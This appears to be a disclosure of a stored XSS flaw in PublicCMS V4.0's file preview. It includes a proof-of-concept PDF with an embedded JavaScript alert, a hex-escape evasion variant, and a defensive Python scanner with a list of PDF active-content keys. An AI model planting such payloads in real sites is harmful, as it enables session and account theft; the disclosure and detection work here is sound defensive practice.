sanluan/PublicCMS

There is an xss vulnerability caused by file uploads in PublicCMS V4.0


1. Vulnerability description
Because files can be uploaded and an online preview function is provided, PDF files and HTML files containing malicious code can be uploaded, and an XSS popup is triggered through online viewing.

2. Vulnerability exploitation process
Affected function:
Development - Website file management - Upload files - Click to view

3. XSS vulnerability hazards
After a successful attack using XSS code, malicious users may obtain high privileges. The XSS vulnerability mainly has the following hazards:
(1) Stealing various user accounts;
(2) Stealing the user's cookie information and impersonating the user's identity to enter the website;
(3) Hijacking user sessions and performing arbitrary operations, i.e. controlling the user's browser;
(4) Inflating traffic counts and injecting commercial advertising;
(5) Spreading worms;
and so on.

4. POC (PDF)
Copy the following code into a text file and change the file extension to .pdf.

```
%PDF-1.3
%忏嫌
1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 4 0 R ]
>>
endobj
2 0 obj
<<
/Producer (PyPDF2)
>>
endobj
3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/Names <<
/JavaScript <<
/Names [ (0b1781f6\0559e7f\0554c59\055b8fd\0557c4588f0d14c) 5 0 R ]
>>
>>
>>
endobj
4 0 obj
<<
/Type /Page
/Resources <<
>>
/MediaBox [ 0 0 72 72 ]
/Parent 1 0 R
>>
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app\056alert\050\047xss\047\051\073)
>>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000074 00000 n 
0000000114 00000 n 
0000000262 00000 n 
0000000350 00000 n 
trailer
<<
/Size 6
/Root 3 0 R
/Info 2 0 R
>>
startxref
445
%%EOF
```

5. Modification suggestion
It is recommended not to enable the online viewing function for PDF and HTML files, and to have "click to view" serve the source file directly instead.

Thanks for the bug submission; we have upgraded the PDF XSS security detection mechanism and added test cases.
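The two defences discussed in this thread, refusing to render active content inline (the reporter's suggestion in section 5) and detecting JavaScript inside uploaded PDFs before preview (the maintainer's fix), can be combined in one server-side decision. The following is an added example written for this page; it is not PublicCMS code and does not reflect how the project implements its detection. The `pdf_active_content` and `serving_policy` helpers, the header values, and the three sample PDFs are all constructed here. The PoC sample reuses the object structure of the PDF above (minus the xref table, which the scanner does not need). The example goes a little beyond the page: it resolves `#xx` escapes in PDF names, so a name written as `/Java#53cript` is still caught, and it flags other action keys besides `/JavaScript`.

```python
import re

# Constructed sample: the same object skeleton as the PoC in this issue,
# a one-page PDF whose catalog /Names tree carries a /JavaScript action.
POC_PDF = (
    b"%PDF-1.3\n"
    b"1 0 obj\n<< /Type /Pages /Count 1 /Kids [ 4 0 R ] >>\nendobj\n"
    b"3 0 obj\n<< /Type /Catalog /Pages 1 0 R\n"
    b"/Names << /JavaScript << /Names [ (x) 5 0 R ] >> >> >>\nendobj\n"
    b"4 0 obj\n<< /Type /Page /MediaBox [ 0 0 72 72 ] /Parent 1 0 R >>\nendobj\n"
    b"5 0 obj\n<< /Type /Action /S /JavaScript "
    b"/JS (app\\056alert\\050\\047xss\\047\\051\\073) >>\nendobj\n"
    b"trailer\n<< /Root 3 0 R >>\n%%EOF\n"
)

# Constructed benign sample: same skeleton, no action dictionaries at all.
BENIGN_PDF = (
    b"%PDF-1.3\n"
    b"1 0 obj\n<< /Type /Pages /Count 1 /Kids [ 4 0 R ] >>\nendobj\n"
    b"3 0 obj\n<< /Type /Catalog /Pages 1 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Type /Page /MediaBox [ 0 0 72 72 ] /Parent 1 0 R >>\nendobj\n"
    b"trailer\n<< /Root 3 0 R >>\n%%EOF\n"
)

# Constructed evasion sample: the same PoC with #xx hex escapes in the names.
# A naive substring search for "/JavaScript" misses this; a PDF viewer does not.
ESCAPED_PDF = POC_PDF.replace(b"/JavaScript", b"/Java#53cript").replace(b"/JS ", b"/J#53 ")

# PDF name objects that introduce executable or navigational behaviour.
# /ObjStm is included because compressed object streams can hide any of the
# others from a lexical scan; such files need a full parser or a rejection.
ACTIVE_KEYS = {
    b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
    b"/SubmitForm", b"/ImportData", b"/RichMedia", b"/URI", b"/ObjStm",
}

# A PDF name token: a slash followed by anything up to whitespace or a delimiter.
_NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")


def _unescape_name(raw: bytes) -> bytes:
    """Resolve #xx hex escapes inside a PDF name token (PDF 1.2+ syntax)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)


def pdf_active_content(data: bytes) -> set:
    """Return the set of active-content keys found anywhere in the file.

    Conservative lexical scan: every name token is examined with escapes
    resolved, rather than walking the object graph, so keys inside
    unreferenced or deliberately damaged objects are still reported.
    """
    found = set()
    for m in _NAME_RE.finditer(data):
        name = _unescape_name(m.group(0))
        if name in ACTIVE_KEYS:
            found.add(name)
    return found


def _attachment(filename: str, reason: str) -> dict:
    # Sanitise the filename before it goes into a header to avoid header injection.
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "inline": False,
        "reason": reason,
        "headers": {
            "X-Content-Type-Options": "nosniff",
            "Content-Type": "application/octet-stream",
            "Content-Disposition": f'attachment; filename="{safe}"',
        },
    }


def serving_policy(filename: str, data: bytes) -> dict:
    """Decide how a "click to view" request for an uploaded file is answered.

    Markup (HTML/SVG/XML) and PDFs carrying actions are forced to download,
    which is the mitigation proposed in the issue; only a PDF without any
    active-content keys is offered inline.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in {"html", "htm", "xhtml", "svg", "xml"} or data.lstrip()[:1] == b"<":
        return _attachment(filename, "markup would render as a page")
    if ext == "pdf" or data.startswith(b"%PDF"):
        keys = pdf_active_content(data)
        if keys:
            names = ", ".join(sorted(k.decode() for k in keys))
            return _attachment(filename, "pdf active content: " + names)
        safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
        return {
            "inline": True,
            "reason": "pdf without actions",
            "headers": {
                "X-Content-Type-Options": "nosniff",
                "Content-Type": "application/pdf",
                "Content-Disposition": f'inline; filename="{safe}"',
            },
        }
    return _attachment(filename, "unknown type")


if __name__ == "__main__":
    for name, blob in [("poc.pdf", POC_PDF), ("escaped.pdf", ESCAPED_PDF),
                       ("clean.pdf", BENIGN_PDF), ("page.html", b"<script>alert(1)</script>")]:
        print(name, serving_policy(name, blob)["reason"])
```

The scan is deliberately lexical: it trades a few false positives (a `/URI` link annotation in an otherwise harmless document) for robustness against malformed files that a strict parser would reject but a lenient viewer would still open. Whatever the scan decides, the `nosniff` header and an explicit `Content-Type` stop the browser from second-guessing a download as HTML.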